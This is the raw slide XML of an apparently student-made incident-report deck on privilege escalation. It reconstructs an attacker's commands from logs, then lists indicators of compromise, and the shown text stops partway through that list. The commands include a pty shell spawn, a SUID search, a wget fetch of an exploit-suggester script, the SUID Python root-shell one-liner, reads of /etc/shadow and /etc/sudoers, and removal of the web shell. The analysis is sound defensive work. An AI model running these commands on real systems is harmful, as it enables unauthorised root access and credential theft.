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63" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="275" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="276" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="277" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="281" r:id="rId22"/>
    <p:sldId id="285" r:id="rId23"/>
    <p:sldId id="284" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="283" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="274" r:id="rId28"/>
    <p:sldId id="272" r:id="rId29"/>
    <p:sldId id="280" r:id="rId30"/>
    <p:sldId id="279" r:id="rId31"/>
    <p:sldId id="273"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09B1AF-4BAC-4BD0-9632-7128E98E83F7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/5/2025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6D16D6-F8FF-4EAD-874E-59C01DA393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6D16D6-F8FF-4EAD-874E-59C01DA393B1}"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3438A6-75AE-4F8A-9B0A-8A4CB631DE57}"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3438A6-75AE-4F8A-9B0A-8A4CB631DE57}"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3438A6-75AE-4F8A-9B0A-8A4CB631DE57}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/5/2025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3438A6-75AE-4F8A-9B0A-8A4CB631DE57}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/5/2025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438A6-75AE-4F8A-9B0A-8A4CB631DE57}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/5/2025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438A6-75AE-4F8A-9B0A-8A4CB631DE57}"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3438A6-75AE-4F8A-9B0A-8A4CB631DE57}"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044D1D-4BAF-4FEB-AAFD-702CA4C408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438A6-75AE-4F8A-9B0A-8A4CB631DE57}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/5/2025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044D1D-4BAF-4FEB-AAFD-702CA4C4083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357430"/>
            <a:ext cx="7772400" cy="1500197"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>INCIDENT REPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LOG ANALYSIS – PRIVILEGE ESCALATION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286512" y="4500570"/>
            <a:ext cx="2857488" cy="1000132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Team one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472" y="571480"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESTABLISHING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A SHELL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357290" y="1785926"/>
            <a:ext cx="7786710" cy="5072074"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>A pseudo-terminal shell was spawned for better command execution and interaction:                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>python -c 'import pty; pty.spawn("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>")‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>This gave the attacker a more stable shell environment over the web.</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225536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PRIVILEGE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESCALATION RECONNAISSANCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500034" y="1785926"/>
            <a:ext cx="8643966" cy="5072074"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The attacker searched for binaries useful for escalation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>find / -name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>find / -name python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>find / -name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>find / -name cc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>They also downloaded Linux Exploit Suggester to identify vulnerable privilege escalation paths:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>wget https://raw.githubusercontent.com/Azzt.../linux-exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>suggester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/master/linux-exploit-suggester.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EXPLOITING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SUID MISCONFIGURATION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="2000240"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The attacker located a Python binary with SUID permissions, allowing them to run code as the root user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>find / -type f -user root -perm -4000 2&gt;/dev/null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Exploitation command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/python -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>os.execl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>("/bin/sh", "sh", "-p")‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This command used Python’s  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>os.execl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>to spawn a privileged shell (-p keeps effective UID as root).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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GAINING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ROOT ACCESS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="1928802"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>With root privileges, the attacker accessed protected files:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /etc/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sudoers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>They also checked system information and configurations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Lsof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat –antp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>dpkg -l</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CLEAN-UP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642910" y="1928802"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To reduce detection, the attacker deleted the PHP shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rm /var/www/html/uploads/x.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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1928802"/>
            <a:ext cx="9144000" cy="2500330"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>INDICATORS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>OF COMPROMISE (IOCS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">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642918"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IOC TYPE INDICATOR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642910" y="1928802"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious Script - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>test.php, x.php in /uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SUID Exploit - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/usr/bin/python with SUID bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Access – </a:t>
            </a:r>
            <a:r>
